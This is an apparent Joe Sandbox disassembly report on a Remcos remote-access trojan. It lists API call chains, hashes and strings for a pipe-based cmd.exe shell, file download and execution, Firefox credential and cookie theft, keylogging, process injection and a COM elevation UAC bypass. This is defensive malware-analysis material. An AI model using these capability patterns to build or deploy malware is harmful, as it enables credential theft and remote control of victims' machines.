                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                          • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                          • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                          • CloseHandle.KERNEL32 ref: 00405A23
                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                          • CloseHandle.KERNEL32 ref: 00405A45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                          • API String ID: 2994406822-3565532687
                                          • Opcode ID: b68ca69e07cf2efade3c1b410fee926f1740e5449c087315abb30bc2acd6c1d9
                                          • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                          • Opcode Fuzzy Hash: b68ca69e07cf2efade3c1b410fee926f1740e5449c087315abb30bc2acd6c1d9
                                          • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                          • String ID: (aF$8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                          • API String ID: 1067849700-1785547828
                                          • Opcode ID: b2e61bf4e72140d30d73e66eeb5ed928e9f66979c4dd0beefda9485d20436982
                                          • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                          • Opcode Fuzzy Hash: b2e61bf4e72140d30d73e66eeb5ed928e9f66979c4dd0beefda9485d20436982
                                          • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                          • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
                                          • API String ID: 3018269243-1913798818
                                          • Opcode ID: 487cb0c94f3c81f9ea2266224390f7fb4e07e51fb2116567e8d70626cc6924ac
                                          • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                          • Opcode Fuzzy Hash: 487cb0c94f3c81f9ea2266224390f7fb4e07e51fb2116567e8d70626cc6924ac
                                          • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          • Opcode ID: 240c7abc9a27c5f0695d89c57ca45c6d86bcae19cd69a5bd1518bd38cb464be9
                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                          • Opcode Fuzzy Hash: 240c7abc9a27c5f0695d89c57ca45c6d86bcae19cd69a5bd1518bd38cb464be9
                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                          APIs
                                          • OpenClipboard.USER32 ref: 004168FD
                                          • EmptyClipboard.USER32 ref: 0041690B
                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                          • String ID: !D@$xdF
                                          • API String ID: 3520204547-3540039394
                                          • Opcode ID: f77a8bd79f0f7ce6039107014e74333b55bee0a4ab0882cfea4256be7aae21ab
                                          • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                          • Opcode Fuzzy Hash: f77a8bd79f0f7ce6039107014e74333b55bee0a4ab0882cfea4256be7aae21ab
                                          • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$xdF$xdF$RG
                                          • API String ID: 3756808967-1574553308
                                          • Opcode ID: 1d3b465f8a309ae3198bcab5bb83e2fcd34d8ef8e9b0c4606d8e85a41c47158d
                                          • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                          • Opcode Fuzzy Hash: 1d3b465f8a309ae3198bcab5bb83e2fcd34d8ef8e9b0c4606d8e85a41c47158d
                                          • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$File$FirstNext
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 3527384056-432212279
                                          • Opcode ID: 61ad11e382702adddc4a1e89b9b08581dc943ae9ab3a3ebcc98b18262fb5c5cd
                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                          • Opcode Fuzzy Hash: 61ad11e382702adddc4a1e89b9b08581dc943ae9ab3a3ebcc98b18262fb5c5cd
                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                          • String ID:
                                          • API String ID: 297527592-0
                                          • Opcode ID: bf3db080d4aec6a02f50ad20c8827227bb634c24fb580ecc49855a8f971feb0a
                                          • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                          • Opcode Fuzzy Hash: bf3db080d4aec6a02f50ad20c8827227bb634c24fb580ecc49855a8f971feb0a
                                          • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0$1$2$3$4$5$6$7
                                          • API String ID: 0-3177665633
                                          • Opcode ID: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                          • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                          • Opcode Fuzzy Hash: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                          • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                          • GetKeyState.USER32(00000010), ref: 0040A46E
                                          • GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                          • ToUnicodeEx.USER32(00475154,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                          • ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                          • String ID: (kG
                                          • API String ID: 1888522110-2813241365
                                          • Opcode ID: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                          • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                          • Opcode Fuzzy Hash: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                          • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                          APIs
                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                          • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                          • API String ID: 1589313981-3345310279
                                          • Opcode ID: e2c31b5db78946f38df81b98e23598b924f86ca336777b9e14443aea536e3df9
                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                          • Opcode Fuzzy Hash: e2c31b5db78946f38df81b98e23598b924f86ca336777b9e14443aea536e3df9
                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040755C
                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Object_wcslen
                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                          • API String ID: 240030777-3166923314
                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                          • GetLastError.KERNEL32 ref: 0041A84C
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
